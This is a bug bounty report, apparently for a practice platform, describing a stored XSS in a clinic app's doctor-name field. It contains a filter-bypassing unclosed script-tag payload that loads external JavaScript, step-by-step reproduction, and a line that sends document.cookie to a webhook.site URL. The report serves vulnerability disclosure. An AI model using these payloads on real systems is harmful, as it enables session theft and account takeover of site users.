BugBountyHunter

Hi,

DESCRIPTION

I found that name of doctors is vulnerable to stored XSS.
There is poor filter applied, which encodes special character if closing tag > is present,
but this can be easily bypassed just by not using it.

I found an easiest way for this to use external script with <script src=''> tag. Here is full payload with not closed script tag: <script+src='https://yourdomain.com/alert.js'+id='

SETPS TO REPRODUCE:

1. Create file named alert.js in your domain, or localhost, with just alert(1) in it.
2. Go to this endpoint, use ID of any doctor:
   https://019046743f9e-pichik.a.firstbloodhackers.com/drpanel/edit-doctor.php?id=1
3. Intercept request while submitting changes.
4. Change parameter name=<script+src='https://yourdomain.com/alert.js'+id='
5. Now if you have, or create new appointment with corresponding doctor alert will be triggered, when you visit your appointment (this require to set payload to drid=1):
   https://019046743f9e-pichik.a.firstbloodhackers.com/manageappointment.php?success&aptid=[appointment-id]
   And also if you visit find doctor endpoint:
   https://019046743f9e-pichik.a.firstbloodhackers.com/doctors.php
   https://019046743f9e-pichik.a.firstbloodhackers.com/meet_drs.php
   or if the doctor is doctor of the month:
   https://019046743f9e-pichik.a.firstbloodhackers.com/about.php

You can also add redirection to your server with cookies, same as in my previous report.
Just add this to your alert.js file:
window.location.href="https://webhook.site/[id]?"+document.cookie;

POC SCREEN

REMEDIATION

Filters are never not enough as a prevention against XSS.
Best prevention is to encode every special character in every ocassion.